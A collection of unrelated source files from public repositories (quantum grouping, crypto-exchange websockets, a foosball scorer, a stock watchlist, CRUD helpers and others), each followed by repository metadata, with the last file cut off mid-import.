del data02 # 删除变量data02,数据"八戒"引用计数为0所有被销毁
del data04 # 删除变量data04,数据"沙僧"引用计数为1 | haiou90/aid_python_core | day02/demo04.py | demo04.py | py | 539 | python | zh | code | 0 | github-code | 36 |
23666599352 | import sys
sys.path.append('../')
import numpy as np
import matplotlib.pyplot as plt
from GroupingAlgorithm import groupingWithOrder
from utils import Label2Chain, H2O, save_object
from joblib import delayed, Parallel
import networkx as nx
from itertools import permutations
from tqdm.auto import tqdm
import copy
sys.setrecursionlimit(10 ** 9)
def n_groups_shuffle(paulis, G, seed, shuffle_paulis=True, shuffle_qubits=True, x=1, n_max=10000, n_delete=0):
G_new = copy.deepcopy(G)
if x < 1 or n_delete > 0:
edges = list(G_new.edges())
if x < 1:
n_delete = int((1 - x) * len(edges))
indices_delete = np.random.default_rng().choice(len(edges), size=n_delete, replace=False)
for index in indices_delete:
G_new.remove_edge(*edges[index])
if not nx.is_connected(G_new):
if n_max == 0:
return np.nan, None, None, G_new
else:
return n_groups_shuffle(paulis, G, seed, shuffle_paulis=shuffle_paulis,
shuffle_qubits=shuffle_qubits, x=x, n_max=n_max - 1, n_delete=n_delete)
np.random.seed(seed)
order_paulis = np.arange(len(paulis))
order_qubits = np.arange(num_qubits)
if shuffle_paulis:
np.random.shuffle(order_paulis)
if shuffle_qubits:
np.random.shuffle(order_qubits)
temp = copy.deepcopy(paulis)
for j in range(len(order_qubits)):
paulis[:, j] = temp[:, order_qubits[j]]
Groups_HEEM, _, _ = groupingWithOrder(paulis[order_paulis], G_new)
return len(Groups_HEEM), order_paulis, order_qubits, G_new
qubit_op = H2O()
num_qubits = qubit_op.num_qubits
paulis, _, _ = Label2Chain(qubit_op)
print('There are {} Pauli strings of {} qubits.'.format(len(qubit_op), num_qubits))
WC_ideal = list(permutations(list(range(num_qubits)), 2))
G_ideal = nx.Graph()
G_ideal.add_nodes_from(range(num_qubits))
G_ideal.add_edges_from(WC_ideal)
backend_parallel = 'multiprocessing'
n = num_qubits
k = 2
total_edges = int(np.math.factorial(n) / (np.math.factorial(n - k) * 2))
n_x = 20
N = 3000
x_vec = np.linspace((num_qubits - 1) / total_edges, 1, n_x)
n_groups_list = []
optimal_order_paulis = []
optimal_order_qubits = []
optimal_graph = []
pbar_outer = tqdm(range(n_x), desc='Connectivity', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=0)
for i in pbar_outer:
pbar_inner = tqdm(range(N), desc='Shuffling', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=1)
results = Parallel(n_jobs=-1, backend=backend_parallel)(
delayed(n_groups_shuffle)(paulis, G_ideal, None, x=x_vec[i]) for j in
pbar_inner)
print('-' * 90)
n_groups = [results[i][0] for i in range(N)]
delete_indices = np.where(np.isnan(n_groups))[0]
for j, index in enumerate(delete_indices):
n_groups.pop(index - j)
results.pop(index - j)
n_groups_list.append(n_groups)
index_min = np.argmin(n_groups)
optimal_order_paulis.append(results[index_min][1])
optimal_order_qubits.append(results[index_min][2])
optimal_graph.append(results[index_min][3])
n_std = np.zeros(n_x)
n_avg = np.zeros(n_x)
n_min = np.zeros(n_x)
n_max = np.zeros(n_x)
for i in range(n_x):
n_std[i] = np.std(n_groups_list[i])
n_avg[i] = np.mean(n_groups_list[i])
n_min[i] = np.min(n_groups_list[i])
n_max[i] = np.max(n_groups_list[i])
fig, ax = plt.subplots()
ax.plot(x_vec, n_avg)
ax.fill_between(x_vec, n_avg - n_std, n_avg + n_std, alpha=0.25)
ax.plot(x_vec, n_min, '--')
ax.plot(x_vec, n_max, '--')
ax.set_xlabel('x')
ax.set_ylabel('# of groups')
ax.set_xlim([x_vec[0], x_vec[-1]])
fig.show()
file = 'H20_grouping_shuffle_ideal_vs_connectivity'
data_save = {'x_vec': x_vec, 'n_groups': n_groups_list, 'optimal_order_paulis': optimal_order_paulis,
'optimal_order_qubits': optimal_order_qubits, 'optimal_graph': optimal_graph}
save_object(data_save, file, overwrite=True)
| sergiomtzlosa/HEEM | Codes/deprecated/Grouping_shuffle_vs_connectivity.py | Grouping_shuffle_vs_connectivity.py | py | 3,807 | python | en | code | null | github-code | 36 |
24199168182 | import asyncio
import logging
import random
from enum import Enum
from uuid import uuid4
import websockets
from wired_exchange.kucoin import CandleStickResolution
from typing import Union
WS_OPEN_TIMEOUT = 10
WS_CONNECTION_TIMEOUT = 3
class WebSocketState(Enum):
STATE_WS_READY = 1
STATE_WS_CLOSING = 2
class WebSocketNotification(Enum):
CONNECTION_LOST = 1
class WebSocketMessageHandler:
def can_handle(self, message: str) -> bool:
pass
def handle(self, message: str) -> bool:
"""process received message and indicates if handler must be kept registered
one time handler are useful when waiting for acknowledgement"""
pass
def on_notification(self, notification: WebSocketNotification):
pass
class KucoinWebSocket:
def __init__(self, endpoint, token, encrypt: bool,
ping_interval: int, ping_timeout: int, connect_id: str = None):
self._encrypt = encrypt
self._ping_timeout = ping_timeout
self._ping_interval = ping_interval
self._endpoint = endpoint
self._token = token
self._id = connect_id if connect_id is not None else str(uuid4()).replace('-', '')
self._logger = logging.getLogger(type(self).__name__)
self._ws = None
self._connected = asyncio.Event()
self._handlers = [PongMessageHandler(self, self._ping_interval, self._ping_timeout),
self.WelcomeMessageHandler(self._connected), SinkMessageHandler()]
self._state: WebSocketState = WebSocketState.STATE_WS_READY
async def open_async(self):
uri = f"{self._endpoint}?token={self._token}&connectId={self._id}"
try:
if self._state != WebSocketState.STATE_WS_READY:
return
async for ws in websockets.connect(uri,
logger=self._logger,
ssl=self._encrypt,
open_timeout=WS_OPEN_TIMEOUT,
ping_interval=self._ping_interval,
ping_timeout=self._ping_timeout):
try:
if self._state == WebSocketState.STATE_WS_CLOSING:
break
self._ws = ws
self._disconnect()
await self._run_message_loop(ws)
except websockets.ConnectionClosed:
continue
finally:
for handler in self._handlers:
handler.on_notification(WebSocketNotification.CONNECTION_LOST)
self._disconnect()
self._ws = None
self._state = WebSocketState.STATE_WS_READY
async def _run_message_loop(self, ws: websockets):
async for message in ws:
try:
if self._state == WebSocketState.STATE_WS_CLOSING:
break
self._handle_message(message)
except:
self._logger.error(f'something goes wrong when processing message: {message}', exc_info=True)
def insert_handler(self, handler: WebSocketMessageHandler):
self._handlers.insert(0, handler)
self._logger.debug(f'{type(handler).__name__}: handler registered')
def _handle_message(self, message):
for handler in self._handlers:
if handler.can_handle(message):
self._logger.debug(f'handler found: {type(handler).__name__}')
handler.handle(message)
return
async def subscribe_klines_async(self, topics: list[tuple[str, str, CandleStickResolution]]):
try:
await self.wait_connection_async()
subscription_id = random.randint(100000000, 1000000000)
self.insert_handler(SubscriptionHandler(subscription_id))
await self._ws.send(self._new_klines_subscription_message(subscription_id, topics))
self._logger.debug('kline subscription completed')
except TimeoutError:
self._logger.error('kline subscription timeout', exc_info=True)
async def subscribe_tickers_async(self, tickers: Union[list[tuple[str, str]], None]):
try:
await self.wait_connection_async()
subscription_id = random.randint(100000000, 1000000000)
self.insert_handler(SubscriptionHandler(subscription_id))
await self._ws.send(self._new_tickers_subscription_message(subscription_id, tickers))
self._logger.debug('ticker subscription completed')
except TimeoutError:
self._logger.error('ticker subscription timeout', exc_info=True)
def _new_tickers_subscription_message(self, subscription_id: int,
tickers: Union[list[tuple[str, str]], None]):
if tickers is None:
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/ticker:all",
"response": true
}}
"""
else:
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/ticker:{','.join([f'{bc}-{qc}' for bc, qc in tickers])}",
"response": true
}}
"""
def _new_klines_subscription_message(self, subscription_id: int,
topics: list[tuple[str, str, CandleStickResolution]]):
return f"""
{{
"id": {subscription_id},
"type": "subscribe",
"topic": "/market/candles:{','.join([f'{bc}-{qc}_{res.value}' for bc, qc, res in topics])}",
"response": true
}}
"""
def _disconnect(self):
self._connected.clear()
return self
def is_connected(self):
self._connected.is_set()
def wait_connection_async(self, timeout: int = WS_CONNECTION_TIMEOUT):
return asyncio.wait_for(self._connected.wait(), timeout)
def close(self):
self._state = WebSocketState.STATE_WS_CLOSING
async def send(self, message):
await self.wait_connection_async()
await self._ws.send(message)
class WelcomeMessageHandler(WebSocketMessageHandler):
def __init__(self, event: asyncio.Event):
self._connected = event
self._logger = logging.getLogger(type(self).__name__)
def can_handle(self, message):
return not self._connected.is_set() and '"type":"welcome"' in message
def handle(self, message):
self._connected.set()
self._logger.debug('connection acknowledged by server')
return True
class PongMessageHandler(WebSocketMessageHandler):
def __init__(self, ws: KucoinWebSocket, ping_interval: int, ping_timeout: int):
self._ws = ws
self._ping_interval = ping_interval / 1000 * .95
self._ping_timeout = ping_timeout / 1000
self._task = asyncio.create_task(self._loop())
self._task.set_name('ping_pong')
self._pong = asyncio.Event()
self._logger = logging.getLogger(type(self).__name__)
async def _loop(self):
while True:
try:
await self._send_ping_message()
await asyncio.wait_for(self._pong.wait(), self._ping_timeout)
self._pong.clear()
await asyncio.sleep(self._ping_interval)
except TimeoutError:
self._logger.warning('ping timeout reached without pong')
continue
except asyncio.CancelledError:
self._logger.warning('ping handler stopped')
break
def can_handle(self, message):
return f'"type":"pong"' in message
def handle(self, message):
self._pong.set()
return True
def on_notification(self, notification: WebSocketNotification):
if notification == WebSocketNotification.CONNECTION_LOST:
self._task.cancel()
def _send_ping_message(self):
message_id = random.randint(100000000, 1000000000)
return self._ws.send(f'{{ "id":{message_id},"type":"ping" }}')
class SinkMessageHandler(WebSocketMessageHandler):
def __init__(self):
self._logger = logging.getLogger(type(self).__name__)
def can_handle(self, message):
return True
def handle(self, message):
self._logger.debug(f'unhandled message received: {message}')
return True
class SubscriptionHandler(WebSocketMessageHandler):
def __init__(self, subscription_id: int):
self.subscription_id = subscription_id
self._logger = logging.getLogger(type(self).__name__)
def can_handle(self, message: str) -> bool:
return f'"id":{self.subscription_id}' in message
def handle(self, message: str) -> bool:
if '"type":"ack"' in message:
self._logger.info(f'subscription #{self.subscription_id} acknowledged')
else:
self._logger.warning(f'subscription #{self.subscription_id}: unexpected response: {message}')
return False
class StrategyHandler(WebSocketMessageHandler):
pass
| WiredSharp/wiredExchange | wired_exchange/kucoin/WebSocket.py | WebSocket.py | py | 9,314 | python | en | code | 0 | github-code | 36 |
2791908838 | import pandas as pd
import numpy as np
table = pd.read_excel("TABLE1_updated.xlsx")
table.to_html('finalTable.html')
table.to_json('finalTable.json',orient='records')
# Filtrar por major_grouping_variable
# Agrupar por artigo
# Juntar códigos
ds = pd.read_excel("table_generator/finalTable.xlsx")
majors = table.major_grouping_variable.unique()
articles = table.article.unique()
table = pd.DataFrame(
columns = articles,
index = majors
)
def format_code_list (codes):
formatted_codes = ""
for code in codes[:-1]:
formatted_codes = formatted_codes + str(code) + ", "
formatted_codes = formatted_codes + str(codes.iloc[-1])
return(formatted_codes)
article = articles[10]
major = majors[6]
codes = ds[(ds.major_grouping_variable == major) & (ds.article == article)].code
for major in majors:
print(major)
for article in articles:
codes = ds[(ds.major_grouping_variable == major) & (ds.article == article)].code
print(article)
if (len(codes) > 0):
formatted_codes = format_code_list (codes)
table.at[major, article] = formatted_codes
else:
table.at[major, article] = "-"
table["Unnamed: 0"] = table["Unnamed: 0"].apply(lambda row: "<strong>"+str(row)+"</strong>")
table.to_html('Table1FINAL.html', escape = False)
table.to_csv('Table1FINAL.csv')
| marianacpais/RS_ambulatory_conditions | table_generator/main.py | main.py | py | 1,363 | python | en | code | 0 | github-code | 36 |
42117172102 | from gpiozero import Button, PWMLED, MotionSensor
from time import sleep, time
from signal import pause
from datetime import datetime, timedelta
import simpleaudio as sa
from models import Game, Goal, Team
from game_history import send_game_history
from constants import UI_GAME_CLOCK, UI_TEAM1_SCORE, UI_TEAM2_SCORE
import threading
import queue
def _play_sound_clip(sound_file, wait=False):
wave_obj = sa.WaveObject.from_wave_file(sound_file)
play_obj = wave_obj.play()
if wait:
play_obj.wait_done()
def _get_elapsed_time_string(elapsed_seconds):
hours, rem = divmod(elapsed_seconds, 3600)
minutes, seconds = divmod(rem, 60)
return "{:0>2}:{:0>2}:{:0>2}".format(int(hours), int(minutes), int(seconds))
def _team_scored(team):
_play_sound_clip("/home/pi/Projects/FoosTracks/resources/SoccerGoal.wav")
class AsyncMatch(threading.Thread):
def __init__(self, ui_queue,
team1_name, team1_members,
team2_name, team2_members,
games_per_match=1,
points_to_win=5,
next_game_callback=None,
match_end_callback=None):
super().__init__()
self.ui_queue = ui_queue # queue for asyncrohonus updates to the tkinter UI
self.team1_name = team1_name
self.team2_name = team2_name
self.team1_members = team1_members
self.team2_members = team2_members
self.games_per_match = games_per_match
self.points_to_win = points_to_win
self.next_game_callback = next_game_callback # function that determines whether the next game in the match should be played. Takes no argments and returns boolean, True if game should be played, False if match shoiuld be ended.
self.match_end_callback = match_end_callback # function that notifies UI that the match has ended, takkes no argments and returns nothing.
self.cancelled = False
self.devices = []
def cancel(self):
self.cancelled = True
def run(self):
if not self.cancelled:
self._start_match()
def _start_match(self):
print("Starting match ...")
team1 = Team(name=self.team1_name, members=self.team1_members, score_handler=_team_scored)
team2 = Team(name=self.team2_name, members=self.team2_members, score_handler=_team_scored)
dev = MotionSensor(16, pull_up=True, sample_rate=120, queue_len=1)
goal_a = Goal(name="Goal A",
score_device=dev,
score_handler=None)
dev = MotionSensor(19, pull_up=True, sample_rate=120, queue_len=1)
goal_b = Goal(name="Goal B",
score_device=dev,
score_handler=None)
self.devices = [goal_a.input_device, goal_b.input_device]
games_played = 0
while games_played < self.games_per_match:
if games_played % 2 == 0:
last_game = self._start_new_game(team1, goal_a, team2, goal_b, ui_queue=self.ui_queue)
else:
last_game = self._start_new_game(team1, goal_b, team2, goal_a, ui_queue=self.ui_queue)
if self.cancelled:
self._clean_up()
print("Match was cancelled")
return
# Game has finished check if the next game in the match should be played
games_played += 1
if games_played < self.games_per_match:
if not self._play_next_game(last_game):
self._clean_up()
if self.match_end_callback:
self.match_end_callback()
break
else:
# Match is over
if self.match_end_callback:
self.match_end_callback()
print("Match is over hope you had fun!")
def _start_new_game(self, team1, goal_1, team2, goal_2, sound_fx=True, ui_queue=None):
print("Starting new game ...")
goal_1.set_on_score_handler(team1.did_score)
goal_2.set_on_score_handler(team2.did_score)
game = Game(team1=team1, team2=team2)
game.start()
if sound_fx:
self._start_fx()
start_time = time()
while not game.finished:
if self.cancelled:
print("Game was cancelled")
self._clean_up()
return
self._update_ui(ui_queue, start_time, game)
self._check_game(game)
sleep(0.1)
# Game is finished
self._report_game_stats(game)
return game
def _start_fx(self):
sound_file = "/home/pi/Projects/FoosTracks/resources/SoccerCrowd.wav"
wave_obj = sa.WaveObject.from_wave_file(sound_file)
play_obj = wave_obj.play()
def _stop_fx(self):
sa.stop_all()
def _update_ui(self, ui_queue, start_time, game):
elapsed_time = _get_elapsed_time_string(time() - start_time)
team1_score = game.team1.total_score()
team2_score = game.team2.total_score()
if ui_queue:
ui_msg = {
UI_GAME_CLOCK: elapsed_time,
UI_TEAM1_SCORE: team1_score,
UI_TEAM2_SCORE: team2_score
}
ui_queue.put(ui_msg)
def _check_game(self, game):
if game.team1.total_score() >= self.points_to_win and game.team2.total_score() >= self.points_to_win:
assert False, "NOT POSSIBLE FOR BOTH TEAMS TO WIN"
elif game.team1.total_score() >= self.points_to_win:
game.finish()
elif game.team2.total_score() >= self.points_to_win:
game.finish()
def _clean_up(self):
sa.stop_all()
# unset goal score handlers
for d in self.devices:
d.close()
def _report_game_stats(self, game):
winner = game.get_winning_team()
loser = game.get_losing_team()
send_game_history(game)
self._print_win_message(winning_team=winner, losing_team=loser)
def _print_win_message(self, winning_team, losing_team):
msg = "\n{0} has won!!!\n{0} - {1}, {2} - {3}".format(winning_team.name,
winning_team.total_score(),
losing_team.name,
losing_team.total_score())
print(msg)
def _play_next_game(self, last_game):
if self.next_game_callback:
winner = last_game.get_winning_team()
loser = last_game.get_losing_team()
msg = "{0} won!\n\nScore\n {0} - {1}\n {2} - {3}\n\nPlay next game?".format(winner.name, winner.total_score(), loser.name, loser.total_score())
play_next = self.next_game_callback(message=msg, title="")
return play_next
else:
input("Press enter to play next game ...")
return True | hobe-studios/foos-tracks | rasppi/score_keeper.py | score_keeper.py | py | 7,000 | python | en | code | 0 | github-code | 36 |
19682706596 | import datetime
import json
import requests
from apps.findprice.models import Product, CATEGORY_CHOICES, Scan, User
from apps.findprice.serializers import ProductSerializer, ScanSerializer, ProductsCatSerializer, \
ScansForProductSerializer
from django.contrib.auth.forms import SetPasswordForm
from django.http import JsonResponse
from django.shortcuts import render
from rest_framework import viewsets
class ProductViewSet(viewsets.ModelViewSet):
serializer_class = ProductSerializer
queryset = Product.objects.all()
class ScanViewSet(viewsets.ModelViewSet):
serializer_class = ScanSerializer
queryset = Scan.objects.all()
def getCategory(request):
if request.method == 'GET':
category = []
id = []
for i in range(len(CATEGORY_CHOICES)):
id.append(i)
category.append(CATEGORY_CHOICES[i][0])
categories = [{"id": t, "category": s} for t, s in zip(id, category)]
# return (json.dumps(categories))
return JsonResponse(categories, safe=False)
class getProductsSet(viewsets.ModelViewSet):
# queryset = Product.objects.all()
serializer_class = ProductsCatSerializer
def get_queryset(self):
queryset = Product.objects.all()
category = self.request.query_params.get('cat')
id = self.request.query_params.get('id')
if category is not None:
queryset = queryset.filter(category=category)
if id is not None:
queryset = queryset.filter(id=id)
return queryset
class getProductScan(viewsets.ModelViewSet):
serializer_class = ScansForProductSerializer
def get_queryset(self):
queryset = Scan.objects.all()
filter = self.request.query_params.get('filter')
if filter is not None:
filter = json.loads(filter)
lat = filter['lat']
long = filter['long']
id = filter['id']
dt = filter['dt']
if(id== '*'):
print(id)
pdt = datetime.datetime.strptime(dt, "%Y-%m-%dT%H:%M:%S.%fZ") - datetime.timedelta(days=7)
queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
scan_time__lt=dt, scan_time__gt=pdt).order_by('-scan_time')
else:
queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
long__lte=float(long) + 0.5, long__gte=float(long) - 0.5,
product=id, scan_time__lt=dt).order_by('-scan_time')[:10]
return queryset
| gdoganieri/backendfindprice | apps/findprice/views.py | views.py | py | 2,711 | python | en | code | 0 | github-code | 36 |
7638888119 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 29 17:03:06 2014
@author: aaron
"""
import neblina as nb ### Module for neblina interpreter.
import operators as op ### Module for operators functions.
import ioFunctions as io ### Module for write on disk functions.
import gnuplot as gnuplot ### Module for Gnuplot functions.
import config as cfg ### Module for global variables for Quantum Walk.
import standardDeviation as sd ### Module for Standard Deviation functions.
import numpy as np
import testmode
def run():
probabilities=[]
if not cfg.OVERLAP:
cfg.OVERLAPX=int(cfg.TESSELLATIONPOLYGONS[0])
io.savetxt("HIPERWALK_TEMP_PSI.dat",cfg.STATE,float,'%1.16f')
op.STAGGERED1D()
sd.distances_vector_1D(cfg.RANGEX[0],cfg.RANGEX[1])
cfg.DISTANCE_VECTOR_SIZE=cfg.GRAPHSIZE
# nb.generating_STAGGERED1D_NBL()
nb.runCore_STAGGERED1D()
cfg.STATE=nb.neblina_state_to_vector("NEBLINA_TEMP_final_state.dat")
probabilities=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
output = open("final_distribution.dat",'w')
output1 = open("final_state.dat",'w')
output.write("#POSITION \t PROBABILITY\n")
output1.write("#POSITION \t Re(amplitude) \t \t \t Im(amplitude)\n")
for i in range(int(cfg.GRAPHSIZE)):
output.write("%d \t \t \t%1.16f\n"%(cfg.RANGEX[0]+i,probabilities[i]))
output1.write("%d \t \t \t%1.16f\t\t\t%1.16f\n"%(cfg.RANGEX[0]+i,cfg.STATE[i].real,cfg.STATE[i].imag))
output.close()
output1.close()
if cfg.GNUPLOT:
io.savetxt("HIPERWALK_TEMP_PROBABILITIES.dat",probabilities,float,'%1.16f')
gnuplot.template_STAGGERED1D("HIPERWALK_TEMP_PROBABILITIES.dat","final_distribution.eps","EPS")
if cfg.STEPS>1:
gnuplot.plotStatistics1D()
if cfg.ANIMATION == 1:
gnuplot.plotAnimation1D()
if cfg.TEST_MODE:
modelVector=testmode.create_STAGGERED1D_test_vector()
returnNeblina=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
if np.linalg.norm(modelVector-returnNeblina,np.inf) == float(0):
return 1
else:
return 0
return 1 | hiperwalk/hiperwalk | Archive/staggered1d.py | staggered1d.py | py | 2,333 | python | en | code | 6 | github-code | 36 |
74285321704 | import numpy as np
from point_charge_ewald.atom import Atom
from random import sample
def flatten( l ):
return [ item for sublist in l for item in sublist ]
class Species():
def __init__( self, label, number, q, fixed, allowed_sites, sites ):
self.label = label
self.number = number
self.q = q
self.fixed = fixed
self.allowed_sites = allowed_sites
self.assign_atoms_to_sites( sites )
def assign_atoms_to_sites( self, sites ):
sites_to_occupy = [ s for s in sites if not s.is_occupied
if s.label in self.allowed_sites ]
print( "{} available sites for species {}".format( len( sites_to_occupy ), self.label ) )
assert( len( sites_to_occupy ) >= self.number )
self.atoms = []
for site in sample( sites_to_occupy, self.number ):
this_atom = Atom( self.label, self.q, self.fixed, self.allowed_sites )
site.occupied_by = this_atom
self.atoms.append( this_atom )
| bjmorgan/point_charge_ewald | point_charge_ewald/species.py | species.py | py | 1,054 | python | en | code | 1 | github-code | 36 |
71952073385 | class Solution:
def rotate(self, matrix: List[List[int]]) -> None:
"""
Do not return anything, modify matrix in-place instead.
"""
n = len(matrix)
x = []
for i in range(n):
l = []
for j in range(n-1,-1,-1):
l.append(matrix[j][i])
matrix.append(l)
for i in range(n):
matrix.pop(0)
| Exile404/LeetCode | LEETCODE_Rotate Image.py | LEETCODE_Rotate Image.py | py | 414 | python | en | code | 2 | github-code | 36 |
74060635624 | """
Twilio API NTS token
"""
import asyncio
from functools import partial
from twilio.rest import Client as TwilioRestClient
from server.config import config
class TwilioNTS:
"""
Twilio NTS Token Service
Creates new twilio NTS tokens
"""
def __init__(self, sid=None, token=None):
if sid is None:
sid = config.TWILIO_ACCOUNT_SID # pragma: no cover
if token is None:
token = config.TWILIO_TOKEN # pragma: no cover
self.twilio_account_sid = sid
self.twilio_token = token
self.client = TwilioRestClient(self.twilio_account_sid, self.twilio_token)
async def server_tokens(self, ttl=None) -> list[dict[str]]:
"""
Fetches token from Twilio
# Params
- `ttl`: ttl in seconds
"""
if ttl is None:
ttl = config.TWILIO_TTL # pragma: no cover
loop = asyncio.get_running_loop()
token = await loop.run_in_executor(None, partial(self.client.tokens.create, ttl))
return token.ice_servers
| FAForever/server | server/ice_servers/nts.py | nts.py | py | 1,056 | python | en | code | 64 | github-code | 36 |
1818161052 | #!/usr/bin/python3
import os
import socket
import socketserver
import threading
SERVER_HOST = 'localhost'
SERVER_PORT = 9999
BUF_SIZE = 1024
ECHO_MSG = 'Hello echo server!'
class ForkingClient():
def __init__(self, ip, port):
self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.sock.connect((ip,port))
def run(self):
current_process_id = os.getpid()
print('PID %s Sending echo message to the server:"%s"' % (current_process_id,ECHO_MSG))
sent_data_length = self.sock.send(bytes(ECHO_MSG, 'UTF-8'))
print("Sent : %d characters,so far..." %sent_data_length)
response = self.sock.recv(BUF_SIZE)
print("PID %s received: %s" %(current_process_id,response))
def shutdown(self):
self.sock.close()
class ForkingServerRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = 'Hello echo client!'
current_process_id = os.getpid()
response = '%s: %s' % (current_process_id,data)
print ("Server sending response : %s" %response)
self.request.send(bytes(response,'UTF-8'))
return
class ForkingServer(socketserver.ForkingMixIn,socketserver.TCPServer,):
def __init__(self, server_address, RequestHandlerClass):
self.allow_reuse_address = True
socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
def main():
server = ForkingServer((SERVER_HOST,SERVER_PORT),ForkingServerRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
print ('Server loop running PID: %s ' % os.getpid())
client1 = ForkingClient(ip,port)
client1.run()
client2 = ForkingClient(ip,port)
client2.run()
client1.shutdown()
client2.shutdown()
server.shutdown()
server.socket.close()
if __name__ =='__main__':
main()
| veryfreebird/codebase | pyexec/py3/9-networks-forking.py | 9-networks-forking.py | py | 1,995 | python | en | code | 2 | github-code | 36 |
19909624310 | """MAIN MODULE TO RUN"""
from datetime import datetime
import stonk_functions as func
#gets the top sector for the week
sectorOG = func.get_sector()
sector = (sectorOG.replace(' ','')).lower()
#gets todays date
day = datetime.today().strftime('%A')
if day.lower() in ("saturday", "sunday"):
day = "Friday"
today = datetime.now()
date = (f"{today.strftime('%B')} {today.day}")
"""Add Link for Criteria Here using https://finviz.com/screener.ashx"""
#the urls for stock criteria
win_sector = f"https://finviz.com/screener.ashx?v=111&f=sec_{sector},sh_avgvol_o1000,sh_price_o5,sh_relvol_o1.5,targetprice_above&ft=4"
rsi = "https://finviz.com/screener.ashx?v=211&f=sh_avgvol_o1000,sh_price_o5,ta_rsi_os30,ta_sma200_pa,targetprice_above&ft=4"
"""Add New Criteria Variable to urls Dict and assign a label"""
#dict of criteria urls and there label
urls = {win_sector: f"{sectorOG} Winners", rsi : "Oversold"}
#gets the stocks for each criteria and adds them to the stonks dict
stonks = func.get_stocks(urls)
#gets todays watchlist listing
main_str = func.get_main(day,stonks)
#gets current watchlist contents
with open("watchlist.txt", 'r') as file:
contents = file.read()
#if its Monday, start a new watchlist
if day == 'Monday':
with open("watchlist.txt", 'w') as file:
file.write(main_str + '\n')
#if its not Monday, add todays stocks to the current watchlist
else:
content_list = contents.split('\n\n')
#remove the current days entry if its there to make space for updated entry
with open("watchlist.txt", "w") as f:
for i in content_list:
if day not in i:
f.write(f"{i}\n")
f.truncate()
#add todays entry
with open("watchlist.txt", 'a') as file:
file.write(main_str + '\n')
#gets weeks updated wathlist and prints it
with open("watchlist.txt", 'r') as file:
contents = file.read()
print('Watchlist', date)
print(contents)
| abbasn785/Stock-Market-Watchlist-Assistant | stonks.py | stonks.py | py | 2,001 | python | en | code | 0 | github-code | 36 |
28721703847 | import warnings
import statsmodels.api as sm
from statsmodels.stats.outliers_influence import variance_inflation_factor
def print_vif(x):
"""Utility for checking multicollinearity assumption
:param x: input features to check using VIF. This is assumed to be a pandas.DataFrame
:return: nothing is returned the VIFs are printed as a pandas series
"""
# Silence numpy FutureWarning about .ptp
with warnings.catch_warnings():
warnings.simplefilter("ignore")
x = sm.add_constant(x)
vifs = []
for i in range(x.shape[1]):
vif = variance_inflation_factor(x.values, i)
vifs.append(vif)
print('VIF results\n-------------------------------')
print(pd.Series(vifs, index=x.columns))
print('-------------------------------\n') | Ninjaneer1/theWorks | print_vif.py | print_vif.py | py | 803 | python | en | code | 0 | github-code | 36 |
15867444691 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from typing import Any, Dict, Generic, Type, TypeVar, NoReturn
from pydantic import BaseModel
from sqlalchemy import select, update, delete, and_
from sqlalchemy.ext.asyncio import AsyncSession
from backend.app.models.base import MappedBase
ModelType = TypeVar('ModelType', bound=MappedBase)
CreateSchemaType = TypeVar('CreateSchemaType', bound=BaseModel)
UpdateSchemaType = TypeVar('UpdateSchemaType', bound=BaseModel)
class CRUDBase(Generic[ModelType, CreateSchemaType, UpdateSchemaType]):
def __init__(self, model: Type[ModelType]):
self.model = model
async def get_(
self,
db: AsyncSession,
*,
pk: int | None = None,
name: str | None = None,
status: int | None = None,
del_flag: int | None = None,
) -> ModelType | None:
"""
通过主键 id 或者 name 获取一条数据
:param db:
:param pk:
:param name:
:param status:
:param del_flag:
:return:
"""
assert pk is not None or name is not None, '查询错误, pk 和 name 参数不能同时存在'
assert pk is None or name is None, '查询错误, pk 和 name 参数不能同时为空'
where_list = [self.model.id == pk] if pk is not None else [self.model.name == name]
if status is not None:
assert status in (0, 1), '查询错误, status 参数只能为 0 或 1'
where_list.append(self.model.status == status)
if del_flag is not None:
assert del_flag in (0, 1), '查询错误, del_flag 参数只能为 0 或 1'
where_list.append(self.model.del_flag == del_flag)
result = await db.execute(select(self.model).where(and_(*where_list)))
return result.scalars().first()
async def create_(self, db: AsyncSession, obj_in: CreateSchemaType, user_id: int | None = None) -> NoReturn:
"""
新增一条数据
:param db:
:param obj_in: Pydantic 模型类
:param user_id:
:return:
"""
if user_id:
create_data = self.model(**obj_in.dict(), create_user=user_id)
else:
create_data = self.model(**obj_in.dict())
db.add(create_data)
async def update_(
self, db: AsyncSession, pk: int, obj_in: UpdateSchemaType | Dict[str, Any], user_id: int | None = None
) -> int:
"""
通过主键 id 更新一条数据
:param db:
:param pk:
:param obj_in: Pydantic模型类 or 对应数据库字段的字典
:param user_id:
:return:
"""
if isinstance(obj_in, dict):
update_data = obj_in
else:
update_data = obj_in.dict(exclude_unset=True)
if user_id:
update_data.update({'update_user': user_id})
result = await db.execute(update(self.model).where(self.model.id == pk).values(**update_data))
return result.rowcount
async def delete_(self, db: AsyncSession, pk: int, *, del_flag: int | None = None) -> int:
"""
通过主键 id 删除一条数据
:param db:
:param pk:
:param del_flag:
:return:
"""
if del_flag is None:
result = await db.execute(delete(self.model).where(self.model.id == pk))
else:
assert del_flag == 1, '删除错误, del_flag 参数只能为 1'
result = await db.execute(update(self.model).where(self.model.id == pk).values(del_flag=del_flag))
return result.rowcount
| fastapi-practices/fastapi_best_architecture | backend/app/crud/base.py | base.py | py | 3,602 | python | en | code | 96 | github-code | 36 |
69905055783 | from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from django.shortcuts import get_object_or_404
from .models import Genre, Movie, Comment
import requests
from .serializers import(
